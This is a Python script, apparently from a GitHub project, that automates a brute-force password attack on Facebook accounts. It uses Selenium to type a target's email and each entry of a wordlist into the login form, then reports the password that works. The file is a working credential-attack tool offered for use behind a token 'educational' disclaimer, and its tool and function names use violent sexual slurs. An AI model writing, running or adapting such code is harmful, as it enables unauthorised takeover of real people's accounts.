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'''
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AlphaRapist : Automated Brute-force attack for Facebook
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Author : SunL0w (Dind Thibault)
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Version : 1.0
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Github : https://github.com/SunL0w/AlphaRapist
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/!\ Disclaimer :
This script is for educational use.
I am not responsible if it is used to commit illegal actions.
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GNU GENERAL PUBLIC LICENSE
Version 3, 29 June 2007
Copyright (C) 2007 Free Software Foundation, Inc. <https://fsf.org/>
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Copyright © 2023 Dind Thibault (https://github.com/SunL0w)
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'''
# .: Initialization :.
# -----------------------------------------------------------
import os
import subprocess
import selenium
from selenium import webdriver
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as EC
from time import sleep
if selenium.__version__ < "4.0":
print("[ERROR]: Selenium version is too old. Please update Selenium to version 4.0 or higher.")
sys.exit()
# .: Version of the script :.
# -----------------------------------------------------------
version = "1.0"
# .: Functions :.
# -----------------------------------------------------------
# Function to detect OS, and clear the console
def clear_console():
os.system('cls' if os.name == 'nt' else 'clear')
# Function to print the script banner
def print_banner():
clear_console()
# Get the width of the terminal window
width = int(subprocess.check_output(['tput', 'cols']))
# Calculate the number of spaces to add to the left of the text to center it
spaces = (width - len("[AlphaRapist]")) // 2
# Print a line of "=" that is as wide as the terminal window
print("="*width)
# Print the centered text
print(" " * spaces + "[AlphaRapist]")
print("-"*width)
print(f"The current version is: {version}")
print("Coded by SunL0w")
print("="*width)
print()
# .: Core :.
# -----------------------------------------------------------
print_banner()
target=input("Enter the target's email: ")
PASSWORD_FILE=input("Enter the full path of the password file: ")
print_banner()
print("Choose your browser:")
print("1. Chrome")
print("2. Firefox")
print("3. Safari")
while True:
try:
UserBrowser = int(input("Enter the number of your choice: "))
if UserBrowser == 1:
print_banner()
print("[i] Selected browser: Chrome")
browser = webdriver.Chrome()
break
elif UserBrowser == 2:
print_banner()
print("[i] Selected browser: Firefox")
browser = webdriver.Firefox()
break
elif UserBrowser == 3:
print_banner()
print("[i] Selected browser: Safari")
browser = webdriver.Safari()
break
else:
raise ValueError
except ValueError:
print("[ERROR]: Incorrect settings. Please try again.")
print("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=")
print()
print("[+] Opening the browser to Facebook...")
browser.get('https://www.facebook.com')
print("[SUCCESS] Browser Opened")
print()
sleep(5)
# Button : Only allow essential cookies
print("[INITIALIZATION OF ATTACK]")
print("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=")
print()
# Open the file in read mode, read the data and return it as a string
# split("\n") : splits the resulting string using the newline character
# as separator. This returns a list containing each line of the file as an element.
password_data = open(PASSWORD_FILE, 'r').read().split("\n")
print("[i] Password file selected: ", PASSWORD_FILE)
print(f"[i] TARGET: {target}")
print()
input("[PRESS ENTER TO CONTINUE]")
print_banner()
print("[ATTACKING THE TARGET]")
print("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=")
print()
written_email = "0"
def account_rape(target, index, password):
global written_email
# Function get the title of de web page
def check_title(browser):
get_title = browser.title
return get_title
get_title = check_title(browser)
if written_email == "0":
# Enter the ID
username_box = browser.find_element(By.ID, "email")
username_box.send_keys(target)
sleep(1)
written_email = "1"
# Enter the password
password_box = browser.find_element(By.ID, "pass")
password_box.send_keys(password)
sleep(1)
# Clic Login
# The first thing to do is to look for the ID of the "login" button in
# the code of the page, because the end of this ID changes every time, it starts with : u_0_5_
login_id = browser.find_element(By.CSS_SELECTOR, "[id^='u_0_5_']")
login_box = browser.find_element(By.ID, login_id.get_attribute("id"))
login_box.click()
sleep(5)
else:
# Enter the password
password_box = browser.find_element(By.ID, "pass")
password_box.send_keys(password)
sleep(1)
# Clic Login
login_box = browser.find_element(By.ID, "loginbutton")
login_box.click()
sleep(5)
check_title(browser)
get_title = check_title(browser)
if any(x in get_title for x in ["connexion", "inscription", "log in", "sign in", "Log"]):
return False
else:
print_banner()
print("\033[92m" + f"[PASSWORD FOUND]: {password}" + "\033[0m")
print()
return True
for index, password in zip(range(password_data.__len__()), password_data):
password = password.strip()
print("[+] Trying password [", index, "]: ", password)
if account_rape(target, index, password):
break